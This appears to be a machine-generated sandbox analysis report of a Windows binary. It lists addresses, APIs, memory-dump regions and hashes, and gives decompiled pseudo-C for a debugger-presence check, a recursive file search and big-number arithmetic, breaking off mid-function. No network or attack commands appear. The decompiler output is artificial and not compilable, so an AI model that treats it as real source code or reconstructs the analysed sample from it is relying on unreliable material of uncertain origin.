                                                                            0x00192eab
                                                                            0x00192eab
                                                                            0x00192eab
                                                                            0x00192eb2
                                                                            0x00192eb9
                                                                            0x00192ebe
                                                                            0x00192e7c
                                                                            0x00192e7e
                                                                            0x00192e81
                                                                            0x00192e81
                                                                            0x00192e84
                                                                            0x00192e87
                                                                            0x00192e89
                                                                            0x00192e96
                                                                            0x00192e98
                                                                            0x00192e9e
                                                                            0x00192ea0
                                                                            0x00192ea3
                                                                            0x00192ea3
                                                                            0x00192ea3
                                                                            0x00192ea8
                                                                            0x00000000
                                                                            0x00192ea8
                                                                            0x00192ec1
                                                                            0x00192ec1
                                                                            0x00192ec2
                                                                            0x00192ec5
                                                                            0x00192ec5
                                                                            0x00192ece
                                                                            0x00192ed1
                                                                            0x00000000
                                                                            0x00192ed1
                                                                            0x00192df0
                                                                            0x00192b5a
                                                                            0x00192b5c
                                                                            0x00192b61
                                                                            0x00192b65
                                                                            0x00192b67
                                                                            0x00192b75
                                                                            0x00192b77
                                                                            0x00000000
                                                                            0x00192b77
                                                                            0x00192b69
                                                                            0x00192b6c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00192b70
                                                                            0x00000000
                                                                            0x00192b71
                                                                            0x00192b2b
                                                                            0x00192ae2
                                                                            0x00192ae4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00192ae6
                                                                            0x00192ae8
                                                                            0x00192aea
                                                                            0x00192aea
                                                                            0x00000000
                                                                            0x00192a8e
                                                                            0x00192a8e
                                                                            0x00192a8e
                                                                            0x00192a91
                                                                            0x00192ac7
                                                                            0x00000000
                                                                            0x00192ac7
                                                                            0x00192a94
                                                                            0x00192a94
                                                                            0x00192a97
                                                                            0x00192abb
                                                                            0x00000000
                                                                            0x00192abb
                                                                            0x00192a99
                                                                            0x00192a99
                                                                            0x00192a9c
                                                                            0x00192aaf
                                                                            0x00192aaf
                                                                            0x00000000
                                                                            0x00192aaf
                                                                            0x00192a9e
                                                                            0x00192aa1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00192aa3
                                                                            0x00000000
                                                                            0x00192aa3
                                                                            0x00192a8c
                                                                            0x0019298c
                                                                            0x0019298f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00192993
                                                                            0x00000000
                                                                            0x00192993
                                                                            0x00192972
                                                                            0x00192975
                                                                            0x00000000
                                                                            0x00192977
                                                                            0x00192977
                                                                            0x00192979
                                                                            0x00000000
                                                                            0x00192979
                                                                            0x00192975
                                                                            0x00192874
                                                                            0x00192877
                                                                            0x00000000
                                                                            0x0019287d
                                                                            0x00192889
                                                                            0x00192891
                                                                            0x00192899
                                                                            0x001928a8
                                                                            0x001928b0
                                                                            0x001928b3
                                                                            0x001928b9
                                                                            0x001928bf
                                                                            0x001928c5
                                                                            0x001928c7
                                                                            0x001928d1
                                                                            0x001928d1
                                                                            0x001928d7
                                                                            0x001928de
                                                                            0x001928ec
                                                                            0x001928ef
                                                                            0x001928f5
                                                                            0x001928f5
                                                                            0x00000000
                                                                            0x001928de
                                                                            0x00192877
                                                                            0x00192814
                                                                            0x0019281b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019281b
                                                                            0x0019280b
                                                                            0x0019280b
                                                                            0x00000000
                                                                            0x001927ac
                                                                            0x001927ae
                                                                            0x001930df
                                                                            0x001930e2
                                                                            0x001930f0
                                                                            0x001930fb
                                                                            0x001930fb
                                                                            0x001927aa
                                                                            0x00192746
                                                                            0x00192748
                                                                            0x00000000
                                                                            0x00192748
                                                                            0x001926d6
                                                                            0x001926d8
                                                                            0x001926da
                                                                            0x001926e0
                                                                            0x00000000
                                                                            0x001926ec
                                                                            0x001926ee
                                                                            0x001926f2
                                                                            0x001926fc
                                                                            0x001926fe
                                                                            0x00192707
                                                                            0x00000000
                                                                            0x00192709
                                                                            0x00192719
                                                                            0x0019272a
                                                                            0x0019272f
                                                                            0x00000000
                                                                            0x0019272f
                                                                            0x00192707

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 0019269B
                                                                            • _strlen.LIBCMT ref: 00192C1F
                                                                              • Part of subcall function 001A0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0019B312,00000000,?,?,?,0019004A), ref: 001A0FFA
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00192D76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                            • String ID: CMT
                                                                            • API String ID: 1706572503-2756464174
                                                                            • Opcode ID: 1ed5750ee943359a167ad3a33f4fe78bda8b65583f57c64116a8b99c24d8cd95
                                                                            • Instruction ID: 0f6153642e5b5366c034de5c62efcba7054acedd959740aa67856d6fa45681c4
                                                                            • Opcode Fuzzy Hash: 1ed5750ee943359a167ad3a33f4fe78bda8b65583f57c64116a8b99c24d8cd95
                                                                            • Instruction Fuzzy Hash: AC6206716002849FDF29DF74C895AEA3BE1EF64304F09457EFC9A9B282DB709945CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E001B7BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                            				char _v0;
                                                                            				signed int _v8;
                                                                            				intOrPtr _v524;
                                                                            				intOrPtr _v528;
                                                                            				void* _v532;
                                                                            				intOrPtr _v536;
                                                                            				char _v540;
                                                                            				intOrPtr _v544;
                                                                            				intOrPtr _v548;
                                                                            				intOrPtr _v552;
                                                                            				intOrPtr _v556;
                                                                            				intOrPtr _v560;
                                                                            				intOrPtr _v564;
                                                                            				intOrPtr _v568;
                                                                            				intOrPtr _v572;
                                                                            				intOrPtr _v576;
                                                                            				intOrPtr _v580;
                                                                            				intOrPtr _v584;
                                                                            				char _v724;
                                                                            				intOrPtr _v792;
                                                                            				intOrPtr _v800;
                                                                            				char _v804;
                                                                            				intOrPtr _v808;
                                                                            				char _v812;
                                                                            				signed int _t40;
                                                                            				char* _t47;
                                                                            				intOrPtr _t49;
                                                                            				intOrPtr _t60;
                                                                            				intOrPtr _t61;
                                                                            				intOrPtr _t65;
                                                                            				intOrPtr _t66;
                                                                            				int _t67;
                                                                            				intOrPtr _t68;
                                                                            				signed int _t69;
                                                                            
                                                                            				_t68 = __esi;
                                                                            				_t66 = __edi;
                                                                            				_t65 = __edx;
                                                                            				_t60 = __ebx;
                                                                            				_t40 =  *0x1cd668; // 0x44aa1787
                                                                            				_t41 = _t40 ^ _t69;
                                                                            				_v8 = _t40 ^ _t69;
                                                                            				if(_a4 != 0xffffffff) {
                                                                            					_push(_a4);
                                                                            					E001AE690(_t41);
                                                                            					_pop(_t61);
                                                                            				}
                                                                            				E001AE920(_t66,  &_v804, 0, 0x50);
                                                                            				E001AE920(_t66,  &_v724, 0, 0x2cc);
                                                                            				_v812 =  &_v804;
                                                                            				_t47 =  &_v724;
                                                                            				_v808 = _t47;
                                                                            				_v548 = _t47;
                                                                            				_v552 = _t61;
                                                                            				_v556 = _t65;
                                                                            				_v560 = _t60;
                                                                            				_v564 = _t68;
                                                                            				_v568 = _t66;
                                                                            				_v524 = ss;
                                                                            				_v536 = cs;
                                                                            				_v572 = ds;
                                                                            				_v576 = es;
                                                                            				_v580 = fs;
                                                                            				_v584 = gs;
                                                                            				asm("pushfd");
                                                                            				_pop( *_t22);
                                                                            				_v540 = _v0;
                                                                            				_t25 =  &_v0; // 0x1b
                                                                            				_t49 = _t25;
                                                                            				_v528 = _t49;
                                                                            				_v724 = 0x10001;
                                                                            				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                            				_v804 = _a8;
                                                                            				_v800 = _a12;
                                                                            				_v792 = _v0;
                                                                            				_t67 = IsDebuggerPresent();
                                                                            				SetUnhandledExceptionFilter(0);
                                                                            				_t36 =  &_v812; // -785
                                                                            				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                                            					_push(_a4);
                                                                            					_t57 = E001AE690(_t57);
                                                                            				}
                                                                            				return E001AE203(_t57, _v8 ^ _t69);
                                                                            			}


                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 001B7CD9
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 001B7CE3
                                                                            • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 001B7CF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 26ca22d0da76e8a6d34c48d09e038f92164e6a74559a0b2a88bc63094a79101a
                                                                            • Instruction ID: f82ba1842806a47191262eabcd309a8b2a662bb6d6553f27019148f84cfebeac
                                                                            • Opcode Fuzzy Hash: 26ca22d0da76e8a6d34c48d09e038f92164e6a74559a0b2a88bc63094a79101a
                                                                            • Instruction Fuzzy Hash: 0A31C27490122CABCB61DF64D889BDDBBB8BF58350F5045EAE41CA7290EB709F818F44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
                                                                            			E001B9FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                            				intOrPtr _v8;
                                                                            				signed int _v12;
                                                                            				intOrPtr* _v32;
                                                                            				CHAR* _v36;
                                                                            				signed int _v48;
                                                                            				char _v286;
                                                                            				signed int _v287;
                                                                            				struct _WIN32_FIND_DATAA _v332;
                                                                            				intOrPtr* _v336;
                                                                            				signed int _v340;
                                                                            				signed int _v344;
                                                                            				intOrPtr _v372;
                                                                            				signed int _t35;
                                                                            				signed int _t40;
                                                                            				signed int _t43;
                                                                            				intOrPtr _t45;
                                                                            				signed char _t47;
                                                                            				intOrPtr* _t55;
                                                                            				union _FINDEX_INFO_LEVELS _t57;
                                                                            				union _FINDEX_INFO_LEVELS _t58;
                                                                            				signed int _t62;
                                                                            				signed int _t65;
                                                                            				void* _t71;
                                                                            				void* _t73;
                                                                            				signed int _t74;
                                                                            				void* _t77;
                                                                            				CHAR* _t78;
                                                                            				intOrPtr* _t82;
                                                                            				intOrPtr _t84;
                                                                            				void* _t86;
                                                                            				intOrPtr* _t87;
                                                                            				signed int _t91;
                                                                            				signed int _t95;
                                                                            				void* _t100;
                                                                            				intOrPtr _t101;
                                                                            				signed int _t104;
                                                                            				union _FINDEX_INFO_LEVELS _t105;
                                                                            				void* _t110;
                                                                            				intOrPtr _t111;
                                                                            				void* _t112;
                                                                            				signed int _t117;
                                                                            				void* _t118;
                                                                            				signed int _t119;
                                                                            				void* _t120;
                                                                            				void* _t121;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_t82 = _a4;
                                                                            				_t2 = _t82 + 1; // 0x1
                                                                            				_t100 = _t2;
                                                                            				do {
                                                                            					_t35 =  *_t82;
                                                                            					_t82 = _t82 + 1;
                                                                            				} while (_t35 != 0);
                                                                            				_push(__edi);
                                                                            				_t104 = _a12;
                                                                            				_t84 = _t82 - _t100 + 1;
                                                                            				_v8 = _t84;
                                                                            				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
                                                                            					_push(__ebx);
                                                                            					_push(__esi);
                                                                            					_t5 = _t104 + 1; // 0x1
                                                                            					_t77 = _t5 + _t84;
                                                                            					_t110 = E001B7B1B(_t84, _t77, 1);
                                                                            					_pop(_t86);
                                                                            					__eflags = _t104;
                                                                            					if(_t104 == 0) {
                                                                            						L6:
                                                                            						_push(_v8);
                                                                            						_t77 = _t77 - _t104;
                                                                            						_t40 = E001BDD71(_t86, _t110 + _t104, _t77, _a4);
                                                                            						_t119 = _t118 + 0x10;
                                                                            						__eflags = _t40;
                                                                            						if(__eflags != 0) {
                                                                            							goto L9;
                                                                            						} else {
                                                                            							_t71 = E001BA212(_a16, _t100, __eflags, _t110);
                                                                            							E001B7A50(0);
                                                                            							_t73 = _t71;
                                                                            							goto L8;
                                                                            						}
                                                                            					} else {
                                                                            						_push(_t104);
                                                                            						_t74 = E001BDD71(_t86, _t110, _t77, _a8);
                                                                            						_t119 = _t118 + 0x10;
                                                                            						__eflags = _t74;
                                                                            						if(_t74 != 0) {
                                                                            							L9:
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							E001B7DBB();
                                                                            							asm("int3");
                                                                            							_t117 = _t119;
                                                                            							_t120 = _t119 - 0x150;
                                                                            							_t43 =  *0x1cd668; // 0x44aa1787
                                                                            							_v48 = _t43 ^ _t117;
                                                                            							_t87 = _v32;
                                                                            							_push(_t77);
                                                                            							_t78 = _v36;
                                                                            							_push(_t110);
                                                                            							_t111 = _v332.cAlternateFileName;
                                                                            							_push(_t104);
                                                                            							_v372 = _t111;
                                                                            							while(1) {
                                                                            								__eflags = _t87 - _t78;
                                                                            								if(_t87 == _t78) {
                                                                            									break;
                                                                            								}
                                                                            								_t45 =  *_t87;
                                                                            								__eflags = _t45 - 0x2f;
                                                                            								if(_t45 != 0x2f) {
                                                                            									__eflags = _t45 - 0x5c;
                                                                            									if(_t45 != 0x5c) {
                                                                            										__eflags = _t45 - 0x3a;
                                                                            										if(_t45 != 0x3a) {
                                                                            											_t87 = E001BDDC0(_t78, _t87);
                                                                            											continue;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								break;
                                                                            							}
                                                                            							_t101 =  *_t87;
                                                                            							__eflags = _t101 - 0x3a;
                                                                            							if(_t101 != 0x3a) {
                                                                            								L19:
                                                                            								_t105 = 0;
                                                                            								__eflags = _t101 - 0x2f;
                                                                            								if(_t101 == 0x2f) {
                                                                            									L23:
                                                                            									_t47 = 1;
                                                                            									__eflags = 1;
                                                                            								} else {
                                                                            									__eflags = _t101 - 0x5c;
                                                                            									if(_t101 == 0x5c) {
                                                                            										goto L23;
                                                                            									} else {
                                                                            										__eflags = _t101 - 0x3a;
                                                                            										if(_t101 == 0x3a) {
                                                                            											goto L23;
                                                                            										} else {
                                                                            											_t47 = 0;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								_t89 = _t87 - _t78 + 1;
                                                                            								asm("sbb eax, eax");
                                                                            								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
                                                                            								E001AE920(_t105,  &_v332, _t105, 0x140);
                                                                            								_t121 = _t120 + 0xc;
                                                                            								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
                                                                            								_t55 = _v336;
                                                                            								__eflags = _t112 - 0xffffffff;
                                                                            								if(_t112 != 0xffffffff) {
                                                                            									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                                            									__eflags = _t91;
                                                                            									_t92 = _t91 >> 2;
                                                                            									_v344 = _t91 >> 2;
                                                                            									do {
                                                                            										__eflags = _v332.cFileName - 0x2e;
                                                                            										if(_v332.cFileName != 0x2e) {
                                                                            											L36:
                                                                            											_push(_t55);
                                                                            											_t57 = E001B9FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
                                                                            											_t121 = _t121 + 0x10;
                                                                            											__eflags = _t57;
                                                                            											if(_t57 != 0) {
                                                                            												goto L26;
                                                                            											} else {
                                                                            												goto L37;
                                                                            											}
                                                                            										} else {
                                                                            											_t92 = _v287;
                                                                            											__eflags = _t92;
                                                                            											if(_t92 == 0) {
                                                                            												goto L37;
                                                                            											} else {
                                                                            												__eflags = _t92 - 0x2e;
                                                                            												if(_t92 != 0x2e) {
                                                                            													goto L36;
                                                                            												} else {
                                                                            													__eflags = _v286;
                                                                            													if(_v286 == 0) {
                                                                            														goto L37;
                                                                            													} else {
                                                                            														goto L36;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            										goto L40;
                                                                            										L37:
                                                                            										_t62 = FindNextFileA(_t112,  &_v332);
                                                                            										__eflags = _t62;
                                                                            										_t55 = _v336;
                                                                            									} while (_t62 != 0);
                                                                            									_t102 =  *_t55;
                                                                            									_t95 = _v344;
                                                                            									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                                            									__eflags = _t95 - _t65;
                                                                            									if(_t95 != _t65) {
                                                                            										E001B5030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E001B9E2B);
                                                                            									}
                                                                            								} else {
                                                                            									_push(_t55);
                                                                            									_t57 = E001B9FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
                                                                            									L26:
                                                                            									_t105 = _t57;
                                                                            								}
                                                                            								__eflags = _t112 - 0xffffffff;
                                                                            								if(_t112 != 0xffffffff) {
                                                                            									FindClose(_t112);
                                                                            								}
                                                                            								_t58 = _t105;
                                                                            							} else {
                                                                            								__eflags = _t87 -  &(_t78[1]);
                                                                            								if(_t87 ==  &(_t78[1])) {
                                                                            									goto L19;
                                                                            								} else {
                                                                            									_push(_t111);
                                                                            									_t58 = E001B9FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
                                                                            								}
                                                                            							}
                                                                            							__eflags = _v12 ^ _t117;
                                                                            							return E001AE203(_t58, _v12 ^ _t117);
                                                                            						} else {
                                                                            							goto L6;
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					_t73 = 0xc;
                                                                            					L8:
                                                                            					return _t73;
                                                                            				}
                                                                            				L40:
                                                                            			}

















































                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .
                                                                            • API String ID: 0-248832578
                                                                            • Opcode ID: f5cae65dc1247020027bf2b02ff279085aa99d7caebb56a771d02bedb13e3b6d
                                                                            • Instruction ID: 206eae9716face375af3291761dde21c10605f2ccc755dbfde301a8a54a87dca
                                                                            • Opcode Fuzzy Hash: f5cae65dc1247020027bf2b02ff279085aa99d7caebb56a771d02bedb13e3b6d
                                                                            • Instruction Fuzzy Hash: A331F271900249AFCB249E78CC84EFB7BBDDF86314F5402A8F959D7291EB309D458B60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E001BC0B0(signed int* _a4, signed int* _a8) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				signed int _v52;
                                                                            				signed int _v56;
                                                                            				signed int _v60;
                                                                            				signed int _v64;
                                                                            				signed int _v68;
                                                                            				signed int _v72;
                                                                            				signed int _v76;
                                                                            				signed int* _v80;
                                                                            				char _v540;
                                                                            				signed int _v544;
                                                                            				signed int _t197;
                                                                            				signed int _t198;
                                                                            				signed int* _t200;
                                                                            				signed int _t201;
                                                                            				signed int _t204;
                                                                            				signed int _t206;
                                                                            				signed int _t208;
                                                                            				signed int _t209;
                                                                            				signed int _t213;
                                                                            				signed int _t219;
                                                                            				intOrPtr _t225;
                                                                            				void* _t228;
                                                                            				signed int _t230;
                                                                            				signed int _t247;
                                                                            				signed int _t250;
                                                                            				void* _t253;
                                                                            				signed int _t256;
                                                                            				signed int* _t262;
                                                                            				signed int _t263;
                                                                            				signed int _t264;
                                                                            				void* _t265;
                                                                            				intOrPtr* _t266;
                                                                            				signed int _t267;
                                                                            				signed int _t269;
                                                                            				signed int _t270;
                                                                            				signed int _t271;
                                                                            				signed int _t272;
                                                                            				signed int* _t274;
                                                                            				signed int* _t278;
                                                                            				signed int _t279;
                                                                            				signed int _t280;
                                                                            				intOrPtr _t282;
                                                                            				void* _t286;
                                                                            				signed char _t292;
                                                                            				signed int _t295;
                                                                            				signed int _t303;
                                                                            				signed int _t306;
                                                                            				signed int _t307;
                                                                            				signed int _t309;
                                                                            				signed int _t311;
                                                                            				signed int _t313;
                                                                            				intOrPtr* _t314;
                                                                            				signed int _t318;
                                                                            				signed int _t322;
                                                                            				signed int* _t328;
                                                                            				signed int _t330;
                                                                            				signed int _t331;
                                                                            				signed int _t333;
                                                                            				void* _t334;
                                                                            				signed int _t336;
                                                                            				signed int _t338;
                                                                            				signed int _t341;
                                                                            				signed int _t342;
                                                                            				signed int* _t344;
                                                                            				signed int _t349;
                                                                            				signed int _t351;
                                                                            				void* _t355;
                                                                            				signed int _t359;
                                                                            				signed int _t360;
                                                                            				signed int _t362;
                                                                            				signed int* _t368;
                                                                            				signed int* _t369;
                                                                            				signed int* _t370;
                                                                            				signed int* _t373;
                                                                            
                                                                            				_t262 = _a4;
                                                                            				_t197 =  *_t262;
                                                                            				if(_t197 != 0) {
                                                                            					_t328 = _a8;
                                                                            					_t267 =  *_t328;
                                                                            					__eflags = _t267;
                                                                            					if(_t267 != 0) {
                                                                            						_t3 = _t197 - 1; // -1
                                                                            						_t349 = _t3;
                                                                            						_t4 = _t267 - 1; // -1
                                                                            						_t198 = _t4;
                                                                            						_v16 = _t349;
                                                                            						__eflags = _t198;
                                                                            						if(_t198 != 0) {
                                                                            							__eflags = _t198 - _t349;
                                                                            							if(_t198 > _t349) {
                                                                            								L23:
                                                                            								__eflags = 0;
                                                                            								return 0;
                                                                            							} else {
                                                                            								_t46 = _t198 + 1; // 0x0
                                                                            								_t306 = _t349 - _t198;
                                                                            								_v60 = _t46;
                                                                            								_t269 = _t349;
                                                                            								__eflags = _t349 - _t306;
                                                                            								if(_t349 < _t306) {
                                                                            									L21:
                                                                            									_t306 = _t306 + 1;
                                                                            									__eflags = _t306;
                                                                            								} else {
                                                                            									_t368 =  &(_t262[_t349 + 1]);
                                                                            									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                                            									__eflags = _t341;
                                                                            									while(1) {
                                                                            										__eflags =  *_t341 -  *_t368;
                                                                            										if( *_t341 !=  *_t368) {
                                                                            											break;
                                                                            										}
                                                                            										_t269 = _t269 - 1;
                                                                            										_t341 = _t341 - 4;
                                                                            										_t368 = _t368 - 4;
                                                                            										__eflags = _t269 - _t306;
                                                                            										if(_t269 >= _t306) {
                                                                            											continue;
                                                                            										} else {
                                                                            											goto L21;
                                                                            										}
                                                                            										goto L22;
                                                                            									}
                                                                            									_t369 = _a8;
                                                                            									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                                                                            									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                                            									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                                            										goto L21;
                                                                            									}
                                                                            								}
                                                                            								L22:
                                                                            								__eflags = _t306;
                                                                            								if(__eflags != 0) {
                                                                            									_t330 = _v60;
                                                                            									_t200 = _a8;
                                                                            									_t351 =  *(_t200 + _t330 * 4);
                                                                            									_t64 = _t330 * 4; // 0xffffe9e5
                                                                            									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                                                                            									_v36 = _t201;
                                                                            									asm("bsr eax, esi");
                                                                            									_v56 = _t351;
                                                                            									if(__eflags == 0) {
                                                                            										_t270 = 0x20;
                                                                            									} else {
                                                                            										_t270 = 0x1f - _t201;
                                                                            									}
                                                                            									_v40 = _t270;
                                                                            									_v64 = 0x20 - _t270;
                                                                            									__eflags = _t270;
                                                                            									if(_t270 != 0) {
                                                                            										_t292 = _v40;
                                                                            										_v36 = _v36 << _t292;
                                                                            										_v56 = _t351 << _t292 | _v36 >> _v64;
                                                                            										__eflags = _t330 - 2;
                                                                            										if(_t330 > 2) {
                                                                            											_t79 = _t330 * 4; // 0xe850ffff
                                                                            											_t81 =  &_v36;
                                                                            											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                                                                            											__eflags =  *_t81;
                                                                            										}
                                                                            									}
                                                                            									_v76 = 0;
                                                                            									_t307 = _t306 + 0xffffffff;
                                                                            									__eflags = _t307;
                                                                            									_v32 = _t307;
                                                                            									if(_t307 < 0) {
                                                                            										_t331 = 0;
                                                                            										__eflags = 0;
                                                                            									} else {
                                                                            										_t85 =  &(_t262[1]); // 0x4
                                                                            										_v20 =  &(_t85[_t307]);
                                                                            										_t206 = _t307 + _t330;
                                                                            										_t90 = _t262 - 4; // -4
                                                                            										_v12 = _t206;
                                                                            										_t278 = _t90 + _t206 * 4;
                                                                            										_v80 = _t278;
                                                                            										do {
                                                                            											__eflags = _t206 - _v16;
                                                                            											if(_t206 > _v16) {
                                                                            												_t207 = 0;
                                                                            												__eflags = 0;
                                                                            											} else {
                                                                            												_t207 = _t278[2];
                                                                            											}
                                                                            											__eflags = _v40;
                                                                            											_t311 = _t278[1];
                                                                            											_t279 =  *_t278;
                                                                            											_v52 = _t207;
                                                                            											_v44 = 0;
                                                                            											_v8 = _t207;
                                                                            											_v24 = _t279;
                                                                            											if(_v40 > 0) {
                                                                            												_t318 = _v8;
                                                                            												_t336 = _t279 >> _v64;
                                                                            												_t230 = E001ADDA0(_t311, _v40, _t318);
                                                                            												_t279 = _v40;
                                                                            												_t207 = _t318;
                                                                            												_t311 = _t336 | _t230;
                                                                            												_t359 = _v24 << _t279;
                                                                            												__eflags = _v12 - 3;
                                                                            												_v8 = _t318;
                                                                            												_v24 = _t359;
                                                                            												if(_v12 >= 3) {
                                                                            													_t279 = _v64;
                                                                            													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                                                                            													__eflags = _t360;
                                                                            													_t207 = _v8;
                                                                            													_v24 = _t360;
                                                                            												}
                                                                            											}
                                                                            											_t208 = E001C0DE0(_t311, _t207, _v56, 0);
                                                                            											_v44 = _t262;
                                                                            											_t263 = _t208;
                                                                            											_v44 = 0;
                                                                            											_t209 = _t311;
                                                                            											_v8 = _t263;
                                                                            											_v28 = _t209;
                                                                            											_t333 = _t279;
                                                                            											_v72 = _t263;
                                                                            											_v68 = _t209;
                                                                            											__eflags = _t209;
                                                                            											if(_t209 != 0) {
                                                                            												L40:
                                                                            												_t264 = _t263 + 1;
                                                                            												asm("adc eax, 0xffffffff");
                                                                            												_t333 = _t333 + E001ADDC0(_t264, _t209, _v56, 0);
                                                                            												asm("adc esi, edx");
                                                                            												_t263 = _t264 | 0xffffffff;
                                                                            												_t209 = 0;
                                                                            												__eflags = 0;
                                                                            												_v44 = 0;
                                                                            												_v8 = _t263;
                                                                            												_v72 = _t263;
                                                                            												_v28 = 0;
                                                                            												_v68 = 0;
                                                                            											} else {
                                                                            												__eflags = _t263 - 0xffffffff;
                                                                            												if(_t263 > 0xffffffff) {
                                                                            													goto L40;
                                                                            												}
                                                                            											}
                                                                            											__eflags = 0;
                                                                            											if(0 <= 0) {
                                                                            												if(0 < 0) {
                                                                            													goto L44;
                                                                            												} else {
                                                                            													__eflags = _t333 - 0xffffffff;
                                                                            													if(_t333 <= 0xffffffff) {
                                                                            														while(1) {
                                                                            															L44:
                                                                            															_v8 = _v24;
                                                                            															_t228 = E001ADDC0(_v36, 0, _t263, _t209);
                                                                            															__eflags = _t311 - _t333;
                                                                            															if(__eflags < 0) {
                                                                            																break;
                                                                            															}
                                                                            															if(__eflags > 0) {
                                                                            																L47:
                                                                            																_t209 = _v28;
                                                                            																_t263 = _t263 + 0xffffffff;
                                                                            																_v72 = _t263;
                                                                            																asm("adc eax, 0xffffffff");
                                                                            																_t333 = _t333 + _v56;
                                                                            																__eflags = _t333;
                                                                            																_v28 = _t209;
                                                                            																asm("adc dword [ebp-0x28], 0x0");
                                                                            																_v68 = _t209;
                                                                            																if(_t333 == 0) {
